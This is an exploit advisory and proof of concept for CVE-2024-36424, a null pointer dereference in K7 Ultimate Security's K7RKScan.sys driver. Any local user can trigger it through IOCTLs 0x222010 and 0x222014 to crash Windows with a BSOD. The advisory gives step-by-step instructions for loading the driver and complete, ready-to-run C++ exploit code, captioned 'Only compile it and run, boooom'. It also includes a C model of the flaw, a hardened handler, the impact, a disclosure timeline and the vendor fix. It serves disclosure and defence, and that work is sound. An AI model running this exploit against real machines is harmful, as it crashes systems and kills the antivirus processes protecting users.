
# Exploit Title: K7 Ultimate Security K7RKScan.sys 17.0.2019 - Denial Of Service (DoS)
# Date: 13.08.2024
# Author: M. Akil Gündoğan
# Vendor Homepage: https://k7computing.com/
# Version: < v17.0.2019
# Tested on: Windows 10 Pro x64
# CVE ID: CVE-2024-36424

# Vulnerability Description:
--------------------------------------
In K7 Ultimate Security < v17.0.2019, the driver K7RKScan.sys (version 15.1.0.7 in the tested build) allows local users to cause a denial of service (BSOD), or possibly have unspecified other impact, through a null pointer dereference reachable from IOCTL codes 0x222010 and 0x222014. The driver's device object is also accessible to all users in the "Everyone" group, so no elevated privileges are needed to send these IOCTLs.

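The dispatch pattern behind the null dereference, as an added example in portable C that is not part of this advisory and not K7's driver source: it decodes the two IOCTL codes with the standard CTL_CODE field layout (both come out as METHOD_BUFFERED with FILE_ANY_ACCESS, which is why a caller passing no buffers hands the handler a NULL SystemBuffer) and puts a handler that trusts that pointer next to one that validates method, length and pointer first. The request layout (struct scan_request), the function names and the user-mode "fault" flag are assumptions for illustration; a real kernel handler would page-fault where the model sets the flag.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

/* Windows I/O control codes are built with CTL_CODE(DeviceType, Function, Method,
 * Access) = (DeviceType << 16) | (Access << 14) | (Function << 2) | Method. */
#define METHOD_BUFFERED     0u
#define FILE_ANY_ACCESS     0u
#define FILE_DEVICE_UNKNOWN 0x22u

unsigned ioctl_device_type(uint32_t code) { return (code >> 16) & 0xFFFFu; }
unsigned ioctl_access(uint32_t code)      { return (code >> 14) & 0x3u; }
unsigned ioctl_function(uint32_t code)    { return (code >> 2) & 0xFFFu; }
unsigned ioctl_method(uint32_t code)      { return code & 0x3u; }

/* NTSTATUS values used by the model. */
#define STATUS_SUCCESS                0x00000000u
#define STATUS_INVALID_DEVICE_REQUEST 0xC0000010u
#define STATUS_INVALID_PARAMETER      0xC000000Du
#define STATUS_BUFFER_TOO_SMALL       0xC0000023u

/* Hypothetical request layout; the real driver's format is not published. */
struct scan_request {
    uint32_t target_pid;
    uint32_t flags;
};

/* What the I/O manager hands a METHOD_BUFFERED handler: SystemBuffer is NULL
 * when the caller passed neither an input nor an output buffer, as the PoC does. */
struct irp_model {
    uint32_t    code;
    const void *system_buffer;
    size_t      input_length;
};

/* Vulnerable pattern: uses SystemBuffer without checking pointer or length.
 * In the kernel, reading req->target_pid through NULL is the page fault that
 * becomes the BSOD; this user-mode model records the fault instead of crashing. */
uint32_t dispatch_vulnerable(const struct irp_model *irp, int *faulted)
{
    const struct scan_request *req = irp->system_buffer;
    *faulted = 0;
    if (req == NULL) {          /* stand-in for the kernel page fault */
        *faulted = 1;
        return STATUS_INVALID_PARAMETER;
    }
    return req->target_pid != 0 ? STATUS_SUCCESS : STATUS_INVALID_PARAMETER;
}

/* Hardened pattern: reject the request before touching any data. */
uint32_t dispatch_hardened(const struct irp_model *irp)
{
    if (ioctl_method(irp->code) != METHOD_BUFFERED)
        return STATUS_INVALID_DEVICE_REQUEST;
    if (irp->input_length < sizeof(struct scan_request))
        return STATUS_BUFFER_TOO_SMALL;
    if (irp->system_buffer == NULL)
        return STATUS_INVALID_PARAMETER;
    const struct scan_request *req = irp->system_buffer;
    return req->target_pid != 0 ? STATUS_SUCCESS : STATUS_INVALID_PARAMETER;
}

/* Replays the PoC's DeviceIoControl(hDevice, code, NULL, 0, NULL, 0, ...) call. */
int poc_faults_vulnerable(uint32_t code)
{
    struct irp_model irp = { code, NULL, 0 };
    int faulted;
    dispatch_vulnerable(&irp, &faulted);
    return faulted;
}

uint32_t poc_status_hardened(uint32_t code)
{
    struct irp_model irp = { code, NULL, 0 };
    return dispatch_hardened(&irp);
}

/* A well-formed request (constructed sample input) passes the hardened checks. */
uint32_t valid_request_status_hardened(uint32_t code)
{
    struct scan_request req = { 1234u, 0u };
    struct irp_model irp = { code, &req, sizeof req };
    return dispatch_hardened(&irp);
}

int main(void)
{
    const uint32_t codes[] = { 0x222010u, 0x222014u };
    for (size_t i = 0; i < 2; i++) {
        uint32_t c = codes[i];
        printf("IOCTL 0x%06X: %s, function=0x%03X, method=%u (METHOD_BUFFERED), %s\n",
               (unsigned)c,
               ioctl_device_type(c) == FILE_DEVICE_UNKNOWN ? "FILE_DEVICE_UNKNOWN" : "other device type",
               ioctl_function(c), ioctl_method(c),
               ioctl_access(c) == FILE_ANY_ACCESS ? "FILE_ANY_ACCESS" : "restricted access");
        printf("  vulnerable handler, NULL input: %s\n",
               poc_faults_vulnerable(c) ? "NULL dereference (BSOD)" : "no fault");
        printf("  hardened handler, NULL input:   0x%08X\n", (unsigned)poc_status_hardened(c));
        printf("  hardened handler, valid input:  0x%08X\n", (unsigned)valid_request_status_hardened(c));
    }
    return 0;
}
```

The decoded access field matters as much as the length check: FILE_ANY_ACCESS means the IOCTL itself imposes no access requirement, so with a device DACL that grants "Everyone" access, any local user can reach the handler. A fix that only tightens the handler still leaves the device open to arbitrary callers; restricting the DACL at IoCreateDeviceSecure time is the complementary change.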
# Technical details and step by step Proof of Concept (PoC):
--------------------------------------
1 - Load the driver file from an installed copy of the product, "C:\Program Files (x86)\K7 Computing\K7TSecurity\K7TSecurity\64Bit\K7RKScan.sys", into the system with OSRLoader or with sc create (service type kernel) followed by sc start.

2 - Compile the attached PoC code, written in C++, as a Release build in VS 2022.

3 - Run the compiled PoC directly, e.g. with a double click. The system crashes with a BSOD, so do this in a disposable VM with a snapshot to return to.

# Impact:
--------------------------------------
A local user without elevated privileges can crash the entire system (BSOD). The crash also terminates every process on the machine, including the antivirus processes that rely on this driver on systems where it is loaded and in use.

# Advisories:
--------------------------------------
K7 Computing recommends that all customers update their products to the corresponding versions shown below:

K7 Ultimate Security (17.0.2019 or higher)

# Timeline:
--------------------------------------
- 16.05.2024 - Vulnerability reported.
- 05.08.2024 - Vendor has fixed the vulnerability.
- 13.08.2024 - Released.

# References:
--------------------------------------
- Vendor: https://www.k7computing.com
- Advisory: https://support.k7computing.com/index.php?/selfhelp/view-article/Advisory-issued-on-5th-aug-2024-417
- CVE: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-36424
- Repository: https://github.com/secunnix/CVE-2024-36424

# PoC Code (C++):
-------------------------------------------------------------------------------------------------------------------------

/*
# Usage: Only compile it and run, boooom :)
*/

#include <windows.h>
#include <iostream>
#include <string>

const std::wstring driverDevice = L"\\\\.\\DosK7RKScnDrv"; // K7RKScan.sys symbolic link path
const DWORD ioCTL = 0x222010; // IOCTL 0x222010 or 0x222014

int main() {
    std::cout << "K7 Ultimate Security < v17.0.2019 K7RKScan.sys Null Pointer Dereference - PoC" << std::endl;

    // Open the device. CreateFileW is called explicitly so the wide-string path
    // compiles whether or not the project defines UNICODE.
    HANDLE hDevice = CreateFileW(driverDevice.c_str(),
        GENERIC_READ | GENERIC_WRITE,
        0,
        nullptr,
        OPEN_EXISTING,
        0,
        nullptr);

    if (hDevice == INVALID_HANDLE_VALUE) {
        std::cerr << "Failed, please load driver and check again. Exit... " << GetLastError() << std::endl;
        return 1;
    }

    // Send the IOCTL with no input and no output buffer. For a METHOD_BUFFERED
    // code this leaves the driver with a NULL SystemBuffer, which the vulnerable
    // handler dereferences without checking.
    void* inputBuffer = nullptr; // Null input buffer
    DWORD inputBufferSize = 0;

    DWORD bytesReturned = 0;
    BOOL result = DeviceIoControl(hDevice,
        ioCTL,
        inputBuffer,
        inputBufferSize,
        nullptr,
        0,
        &bytesReturned,
        nullptr);

    // Only reached if the driver survived the request (e.g. a patched build).
    if (!result) {
        std::cerr << "DeviceIoControl failed. Exit... " << GetLastError() << std::endl;
    }

    CloseHandle(hDevice);

    return 0;
}